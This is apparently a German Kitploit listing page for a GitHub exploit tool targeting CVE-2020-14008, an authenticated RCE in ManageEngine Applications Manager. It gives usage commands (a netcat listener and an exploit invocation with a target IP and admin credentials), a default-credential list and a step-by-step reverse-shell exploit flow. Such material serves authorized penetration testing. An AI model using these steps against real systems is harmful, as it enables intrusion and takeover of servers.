Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/0x0d3ad/cve-2020-14008
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRemote-Access-ToolPayload-Entwicklung
GitHub0x0d3ad/cve-2020-14008

CVE-2020-14008

CVE-2020-14008 - ManageEngine Applications Manager RCE

Repository anzeigen
31vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2020-14008 - ManageEngine Applications Manager RCE

Authentifizierte Remote-Codeausführung durch beliebigen Dateiupload in Zoho ManageEngine Applications Manager (Versionen <= 14720).

Zusammenfassung der Schwachstelle

Tool herunterladen
DetailWert
CVECVE-2020-14008
CVSS7.2 (Hoch)
TypAuthentifizierte RCE / Beliebiger Dateiupload
ProduktZoho ManageEngine Applications Manager
BetroffenVersion 14720 und darunter
VoraussetzungGültige Admin-Anmeldedaten
ErgebnisReverse Shell auf SYSTEM-Ebene

Der Exploit missbraucht die Funktion zum Testen der Weblogic-Monitor-Anmeldedaten. Ein authentifizierter Admin lädt eine schädliche weblogic.jar-Datei auf den erwarteten Weblogic-Bibliothekspfad hoch. Wenn der Anmeldedatentest ausgelöst wird, lädt ManageEngine weblogic.jndi.Environment aus der hochgeladenen JAR über JarLoader.loadClass() und newInstance(), wodurch beliebiger Java-Code ausgeführt wird.

Voraussetzungen

System

  • Python 3.x
  • Java JDK (javac und jar im PATH)
  • nc (netcat) zum Abfangen der Reverse Shell

Python-Abhängigkeiten

root@kitploit:~
pip3 install requests urllib3 lxml

Verwendung

1. Listener starten

root@kitploit:~
nc -lvnp 1337

2. Exploit ausführen

root@kitploit:~
python3 cve-2020-14008.py <URL> <BENUTZERNAME> <PASSWORT> <LHOST> <LPORT>

Beispiele

root@kitploit:~
# Einfach
python3 cve-2020-14008.py https://192.168.100.2:8443 admin admin 192.168.100.3 1337

Exploit-Ablauf

  1. Anmeldung - Authentifizierung mit Admin-Anmeldedaten, Sitzungscookie abrufen
  2. Ermittlung - Das Basisinstallationsverzeichnis von ManageEngine abrufen
  3. JAR erstellen - Eine schädliche Java-Klasse (weblogic.jndi.Environment) mit einer Reverse Shell kompilieren und in weblogic.jar packen
  4. Hochladen - Die JAR über Directory Traversal in classes/weblogic/version8/ hochladen (Fallback: eine geplante Aufgabe erstellen, um sie zu verschieben)
  5. Auslösen - Den Weblogic-Anmeldedatentest unter /testCredential.do aufrufen, der die schädliche Klasse lädt und instanziiert
  6. Shell - Reverse Shell verbindet sich zurück zum Listener

Standard-Anmeldedaten

BenutzernamePasswort
adminadmin
adminpassword
administratoradministrator
guestguest

Fehlerbehebung

FehlerLösung
release version 7 not supportedJava 21+ hat Java 7 als Ziel aufgegeben. Das Skript verwendet --release 8
FileNotFoundError: weblogic.jarJAR-Kompilierung fehlgeschlagen. Überprüfen, ob javac und jar im PATH sind
No valid response from used sessionUngültige Anmeldedaten
Actionname not foundAufgabenerstellung fehlgeschlagen, Admin-Berechtigungen prüfen

Referenzen

  • NVD - CVE-2020-14008
  • Exploit-DB #48793
  • ManageEngine Advisory

Haftungsausschluss

Dieses Tool wird ausschließlich für autorisierte Penetrationstests und Sicherheitsforschung bereitgestellt. Die unbefugte Nutzung gegen Systeme, die Sie nicht besitzen oder für die Sie keine Testberechtigung haben, ist illegal.